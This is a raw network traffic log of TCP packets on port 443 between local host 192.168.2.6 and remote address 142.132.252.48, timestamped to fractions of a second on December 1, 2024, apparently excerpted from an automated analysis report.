                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.166235924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.166296005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.166301966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.166332006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.166346073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.172056913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.172084093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.172144890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.172152042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.172187090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.179210901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.179250956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.179291010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.179299116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.179339886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.204982996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.205013037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.205137968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.205147982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.205192089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.209434032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.209460974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.209532022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.209537983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.209574938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.214582920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.214611053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.214673042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.214680910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.214715004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.223702908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.223741055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.223794937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.223803043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.223814964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.223841906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.362857103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.362893105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.362970114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.362978935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.363015890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.369679928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.369704962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.369770050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.369777918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.369816065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.374732971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.374759912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.374825954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.374834061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.374871016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.381577015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.381604910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.381643057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.381650925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.381692886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.405879021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.405908108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.405956030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.405968904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.405997992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.406013012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.411339045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.411360979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.411403894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.411412001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.411454916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.416074991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.416099072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.416157007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.416166067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.416196108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.421104908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.421129942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.421159983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.421169996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.421216965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.564332008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.564404011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.564424038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.564480066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.568869114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.568906069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.568953037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.568959951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.569000006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.569015026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.574553013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.574584961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.574635029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.574646950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.574691057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.581778049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.581811905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.581851006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.581859112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.581892967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.581928968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.606115103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.606154919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.606185913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.606208086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.606223106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.606256008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.611695051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.611733913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.611768007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.611777067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.611819029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.611834049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.617501974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.617542982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.617580891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.617588997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.617619038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.617645025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.622878075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.622909069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.622958899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.622967958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.623018980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.623033047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.758276939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.765531063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.765564919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.765619040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.765625954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.765670061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.770775080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.770797014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.770869970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.770879030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.770899057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.772468090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.776190042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.776217937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.776257038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.776262999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.776295900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.776310921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.782928944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.782959938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.783027887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.783035040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.783072948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.783088923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.807528973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.807562113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.807624102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.807645082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.807682991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.807698011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.814678907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.814709902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.814765930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.814784050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.814805984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.814825058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.818757057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.818793058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.818878889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.818896055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.818934917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.823848963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.823873043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.823935986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.823947906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.823988914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.966886997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.966919899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.967025995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.967042923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.967086077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.972213984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.972237110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.972302914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.972310066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.972349882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.972362041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.977587938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.977616072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.977701902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.977710009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.977756977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.984961987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.984997988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.985069990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.985080004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:14.985129118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.009892941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.009921074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.010045052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.010066986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.010113001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.014712095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.014736891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.014779091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.014787912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.014813900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.014837980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.020365000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.020392895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.020476103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.020483971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.020525932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.026046991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.026070118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.026134968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.026143074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.026184082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.168323040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.168356895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.168505907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.168529034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.168586016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.173911095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.173928976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.173991919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.174001932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.174041033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.183533907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.183561087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.183665991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.183674097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.183717012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.188513041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.188534021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.188605070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.188612938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.188657045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.205658913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.210696936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.210716963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.210822105 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.210835934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.210864067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.210880995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.216470957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.216491938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.216562986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.216571093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.216614962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.222012043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.222028017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.222095966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.222105980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.222137928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.222156048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.227076054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.227093935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.227179050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.227188110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.227230072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.369477987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.369498968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.369559050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.369581938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.369606972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.369632006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.374972105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.374988079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.375047922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.375065088 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.375108004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.385015011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.385040998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.385109901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.385128975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.385494947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.390080929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.390098095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:15.390151024 CET49721443192.168.2.6142.132.252.48
